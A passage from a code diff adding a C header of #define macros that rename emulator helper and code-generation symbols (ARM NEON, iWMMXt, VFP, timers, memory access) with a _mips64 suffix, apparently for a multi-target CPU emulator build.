gen_sbfx gen_sbfx_mips64 +#define gen_set_CF_bit31 gen_set_CF_bit31_mips64 +#define gen_set_condexec gen_set_condexec_mips64 +#define gen_set_cpsr gen_set_cpsr_mips64 +#define gen_set_label gen_set_label_mips64 +#define gen_set_pc_im gen_set_pc_im_mips64 +#define gen_set_psr gen_set_psr_mips64 +#define gen_set_psr_im gen_set_psr_im_mips64 +#define gen_shl gen_shl_mips64 +#define gen_shr gen_shr_mips64 +#define gen_smc gen_smc_mips64 +#define gen_smul_dual gen_smul_dual_mips64 +#define gen_srs gen_srs_mips64 +#define gen_ss_advance gen_ss_advance_mips64 +#define gen_step_complete_exception gen_step_complete_exception_mips64 +#define 
gen_store_exclusive gen_store_exclusive_mips64 +#define gen_storeq_reg gen_storeq_reg_mips64 +#define gen_sub_carry gen_sub_carry_mips64 +#define gen_sub_CC gen_sub_CC_mips64 +#define gen_subq_msw gen_subq_msw_mips64 +#define gen_swap_half gen_swap_half_mips64 +#define gen_thumb2_data_op gen_thumb2_data_op_mips64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips64 +#define gen_ubfx gen_ubfx_mips64 +#define gen_vfp_abs gen_vfp_abs_mips64 +#define gen_vfp_add gen_vfp_add_mips64 +#define gen_vfp_cmp gen_vfp_cmp_mips64 +#define gen_vfp_cmpe gen_vfp_cmpe_mips64 +#define gen_vfp_div gen_vfp_div_mips64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips64 +#define gen_vfp_ld gen_vfp_ld_mips64 +#define gen_vfp_mrs gen_vfp_mrs_mips64 +#define gen_vfp_msr gen_vfp_msr_mips64 +#define gen_vfp_mul gen_vfp_mul_mips64 +#define gen_vfp_neg gen_vfp_neg_mips64 +#define gen_vfp_shto gen_vfp_shto_mips64 +#define gen_vfp_sito gen_vfp_sito_mips64 +#define gen_vfp_slto gen_vfp_slto_mips64 +#define gen_vfp_sqrt gen_vfp_sqrt_mips64 +#define gen_vfp_st gen_vfp_st_mips64 +#define gen_vfp_sub gen_vfp_sub_mips64 +#define gen_vfp_tosh gen_vfp_tosh_mips64 +#define gen_vfp_tosi gen_vfp_tosi_mips64 +#define gen_vfp_tosiz gen_vfp_tosiz_mips64 +#define gen_vfp_tosl gen_vfp_tosl_mips64 +#define gen_vfp_touh gen_vfp_touh_mips64 +#define gen_vfp_toui gen_vfp_toui_mips64 +#define gen_vfp_touiz gen_vfp_touiz_mips64 +#define gen_vfp_toul gen_vfp_toul_mips64 +#define gen_vfp_uhto gen_vfp_uhto_mips64 +#define gen_vfp_uito gen_vfp_uito_mips64 +#define gen_vfp_ulto gen_vfp_ulto_mips64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips64 +#define get_clock get_clock_mips64 +#define get_clock_realtime get_clock_realtime_mips64 +#define get_constraint_priority get_constraint_priority_mips64 +#define get_float_exception_flags get_float_exception_flags_mips64 +#define get_float_rounding_mode 
get_float_rounding_mode_mips64 +#define get_fpstatus_ptr get_fpstatus_ptr_mips64 +#define get_level1_table_address get_level1_table_address_mips64 +#define get_mem_index get_mem_index_mips64 +#define get_next_param_value get_next_param_value_mips64 +#define get_opt_name get_opt_name_mips64 +#define get_opt_value get_opt_value_mips64 +#define get_page_addr_code get_page_addr_code_mips64 +#define get_param_value get_param_value_mips64 +#define get_phys_addr get_phys_addr_mips64 +#define get_phys_addr_lpae get_phys_addr_lpae_mips64 +#define get_phys_addr_mpu get_phys_addr_mpu_mips64 +#define get_phys_addr_v5 get_phys_addr_v5_mips64 +#define get_phys_addr_v6 get_phys_addr_v6_mips64 +#define get_system_memory get_system_memory_mips64 +#define get_ticks_per_sec get_ticks_per_sec_mips64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips64 +#define gt_cntfrq_access gt_cntfrq_access_mips64 +#define gt_cnt_read gt_cnt_read_mips64 +#define gt_cnt_reset gt_cnt_reset_mips64 +#define gt_counter_access gt_counter_access_mips64 +#define gt_ctl_write gt_ctl_write_mips64 +#define gt_cval_write gt_cval_write_mips64 +#define gt_get_countervalue gt_get_countervalue_mips64 +#define gt_pct_access gt_pct_access_mips64 +#define gt_ptimer_access gt_ptimer_access_mips64 +#define gt_recalc_timer gt_recalc_timer_mips64 +#define gt_timer_access gt_timer_access_mips64 +#define gt_tval_read gt_tval_read_mips64 +#define gt_tval_write gt_tval_write_mips64 +#define gt_vct_access gt_vct_access_mips64 +#define gt_vtimer_access gt_vtimer_access_mips64 +#define guest_phys_blocks_free guest_phys_blocks_free_mips64 +#define guest_phys_blocks_init guest_phys_blocks_init_mips64 +#define handle_vcvt handle_vcvt_mips64 +#define handle_vminmaxnm handle_vminmaxnm_mips64 +#define handle_vrint handle_vrint_mips64 +#define handle_vsel handle_vsel_mips64 +#define has_help_option has_help_option_mips64 +#define have_bmi1 have_bmi1_mips64 
+#define have_bmi2 have_bmi2_mips64 +#define hcr_write hcr_write_mips64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips64 +#define helper_add_saturate helper_add_saturate_mips64 +#define helper_add_setq helper_add_setq_mips64 +#define helper_add_usaturate helper_add_usaturate_mips64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mips64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_mips64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips64 +#define helper_be_stl_mmu helper_be_stl_mmu_mips64 +#define helper_be_stq_mmu helper_be_stq_mmu_mips64 +#define helper_be_stw_mmu helper_be_stw_mmu_mips64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips64 +#define helper_clz_arm helper_clz_arm_mips64 +#define helper_cpsr_read helper_cpsr_read_mips64 +#define helper_cpsr_write helper_cpsr_write_mips64 +#define helper_crc32_arm helper_crc32_arm_mips64 +#define helper_crc32c helper_crc32c_mips64 +#define helper_crypto_aese helper_crypto_aese_mips64 +#define helper_crypto_aesmc helper_crypto_aesmc_mips64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips64 +#define helper_crypto_sha1h helper_crypto_sha1h_mips64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips64 +#define helper_crypto_sha256h helper_crypto_sha256h_mips64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips64 +#define helper_dc_zva helper_dc_zva_mips64 +#define helper_double_saturate helper_double_saturate_mips64 +#define helper_exception_internal helper_exception_internal_mips64 +#define helper_exception_return helper_exception_return_mips64 +#define 
helper_exception_with_syndrome helper_exception_with_syndrome_mips64 +#define helper_get_cp_reg helper_get_cp_reg_mips64 +#define helper_get_cp_reg64 helper_get_cp_reg64_mips64 +#define helper_get_r13_banked helper_get_r13_banked_mips64 +#define helper_get_user_reg helper_get_user_reg_mips64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_mips64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips64 +#define helper_iwmmxt_align helper_iwmmxt_align_mips64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips64 +#define helper_iwmmxt_insr 
helper_iwmmxt_insr_mips64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mips64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips64 +#define helper_iwmmxt_rorw 
helper_iwmmxt_rorw_mips64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mips64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mips64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips64 +#define helper_iwmmxt_unpacklsb 
helper_iwmmxt_unpacklsb_mips64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips64 +#define helper_ldb_cmmu helper_ldb_cmmu_mips64 +#define helper_ldb_mmu helper_ldb_mmu_mips64 +#define helper_ldl_cmmu helper_ldl_cmmu_mips64 +#define helper_ldl_mmu helper_ldl_mmu_mips64 +#define helper_ldq_cmmu helper_ldq_cmmu_mips64 +#define helper_ldq_mmu helper_ldq_mmu_mips64 +#define helper_ldw_cmmu helper_ldw_cmmu_mips64 +#define helper_ldw_mmu helper_ldw_mmu_mips64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mips64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_mips64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips64 +#define helper_le_stl_mmu helper_le_stl_mmu_mips64 +#define helper_le_stq_mmu helper_le_stq_mmu_mips64 +#define helper_le_stw_mmu helper_le_stw_mmu_mips64 +#define helper_msr_i_pstate helper_msr_i_pstate_mips64 +#define helper_neon_abd_f32 helper_neon_abd_f32_mips64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips64 +#define helper_neon_abd_s16 helper_neon_abd_s16_mips64 +#define helper_neon_abd_s32 helper_neon_abd_s32_mips64 +#define helper_neon_abd_s8 
helper_neon_abd_s8_mips64 +#define helper_neon_abd_u16 helper_neon_abd_u16_mips64 +#define helper_neon_abd_u32 helper_neon_abd_u32_mips64 +#define helper_neon_abd_u8 helper_neon_abd_u8_mips64 +#define helper_neon_abs_s16 helper_neon_abs_s16_mips64 +#define helper_neon_abs_s8 helper_neon_abs_s8_mips64 +#define helper_neon_acge_f32 helper_neon_acge_f32_mips64 +#define helper_neon_acge_f64 helper_neon_acge_f64_mips64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips64 +#define helper_neon_addl_u16 helper_neon_addl_u16_mips64 +#define helper_neon_addl_u32 helper_neon_addl_u32_mips64 +#define helper_neon_add_u16 helper_neon_add_u16_mips64 +#define helper_neon_add_u8 helper_neon_add_u8_mips64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips64 +#define helper_neon_cge_f32 helper_neon_cge_f32_mips64 +#define helper_neon_cge_s16 helper_neon_cge_s16_mips64 +#define helper_neon_cge_s32 helper_neon_cge_s32_mips64 +#define helper_neon_cge_s8 helper_neon_cge_s8_mips64 +#define helper_neon_cge_u16 helper_neon_cge_u16_mips64 +#define helper_neon_cge_u32 helper_neon_cge_u32_mips64 +#define helper_neon_cge_u8 helper_neon_cge_u8_mips64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips64 +#define helper_neon_cls_s16 helper_neon_cls_s16_mips64 +#define helper_neon_cls_s32 
helper_neon_cls_s32_mips64 +#define helper_neon_cls_s8 helper_neon_cls_s8_mips64 +#define helper_neon_clz_u16 helper_neon_clz_u16_mips64 +#define helper_neon_clz_u8 helper_neon_clz_u8_mips64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mips64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips64 +#define helper_neon_max_s16 helper_neon_max_s16_mips64 +#define helper_neon_max_s32 helper_neon_max_s32_mips64 +#define helper_neon_max_s8 helper_neon_max_s8_mips64 +#define helper_neon_max_u16 helper_neon_max_u16_mips64 +#define helper_neon_max_u32 helper_neon_max_u32_mips64 +#define helper_neon_max_u8 helper_neon_max_u8_mips64 +#define helper_neon_min_s16 helper_neon_min_s16_mips64 +#define helper_neon_min_s32 helper_neon_min_s32_mips64 +#define helper_neon_min_s8 helper_neon_min_s8_mips64 +#define helper_neon_min_u16 helper_neon_min_u16_mips64 +#define helper_neon_min_u32 helper_neon_min_u32_mips64 +#define helper_neon_min_u8 helper_neon_min_u8_mips64 +#define helper_neon_mull_p8 helper_neon_mull_p8_mips64 +#define helper_neon_mull_s16 helper_neon_mull_s16_mips64 +#define helper_neon_mull_s8 helper_neon_mull_s8_mips64 +#define helper_neon_mull_u16 helper_neon_mull_u16_mips64 +#define helper_neon_mull_u8 
helper_neon_mull_u8_mips64 +#define helper_neon_mul_p8 helper_neon_mul_p8_mips64 +#define helper_neon_mul_u16 helper_neon_mul_u16_mips64 +#define helper_neon_mul_u8 helper_neon_mul_u8_mips64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips64 +#define helper_neon_negl_u16 helper_neon_negl_u16_mips64 +#define helper_neon_negl_u32 helper_neon_negl_u32_mips64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips64 +#define helper_neon_padd_u16 helper_neon_padd_u16_mips64 +#define helper_neon_padd_u8 helper_neon_padd_u8_mips64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips64 +#define 
helper_neon_qabs_s16 helper_neon_qabs_s16_mips64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mips64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips64 +#define 
helper_neon_qshl_u64 helper_neon_qshl_u64_mips64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mips64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips64 +#define helper_neon_qunzip16 helper_neon_qunzip16_mips64 +#define helper_neon_qunzip32 helper_neon_qunzip32_mips64 +#define helper_neon_qunzip8 helper_neon_qunzip8_mips64 +#define helper_neon_qzip16 helper_neon_qzip16_mips64 +#define helper_neon_qzip32 helper_neon_qzip32_mips64 +#define helper_neon_qzip8 helper_neon_qzip8_mips64 +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips64 +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips64 +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips64 +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips64 +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips64 +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mips64 +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips64 +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips64 +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips64 +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips64 +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips64 +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips64 +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips64 +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips64 +#define helper_neon_rshl_u8 
helper_neon_rshl_u8_mips64 +#define helper_neon_shl_s16 helper_neon_shl_s16_mips64 +#define helper_neon_shl_s32 helper_neon_shl_s32_mips64 +#define helper_neon_shl_s64 helper_neon_shl_s64_mips64 +#define helper_neon_shl_s8 helper_neon_shl_s8_mips64 +#define helper_neon_shl_u16 helper_neon_shl_u16_mips64 +#define helper_neon_shl_u32 helper_neon_shl_u32_mips64 +#define helper_neon_shl_u64 helper_neon_shl_u64_mips64 +#define helper_neon_shl_u8 helper_neon_shl_u8_mips64 +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips64 +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips64 +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips64 +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips64 +#define helper_neon_subl_u16 helper_neon_subl_u16_mips64 +#define helper_neon_subl_u32 helper_neon_subl_u32_mips64 +#define helper_neon_sub_u16 helper_neon_sub_u16_mips64 +#define helper_neon_sub_u8 helper_neon_sub_u8_mips64 +#define helper_neon_tbl helper_neon_tbl_mips64 +#define helper_neon_tst_u16 helper_neon_tst_u16_mips64 +#define helper_neon_tst_u32 helper_neon_tst_u32_mips64 +#define helper_neon_tst_u8 helper_neon_tst_u8_mips64 +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips64 +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips64 +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips64 +#define helper_neon_unzip16 helper_neon_unzip16_mips64 +#define helper_neon_unzip8 helper_neon_unzip8_mips64 +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips64 +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mips64 +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips64 +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips64 +#define 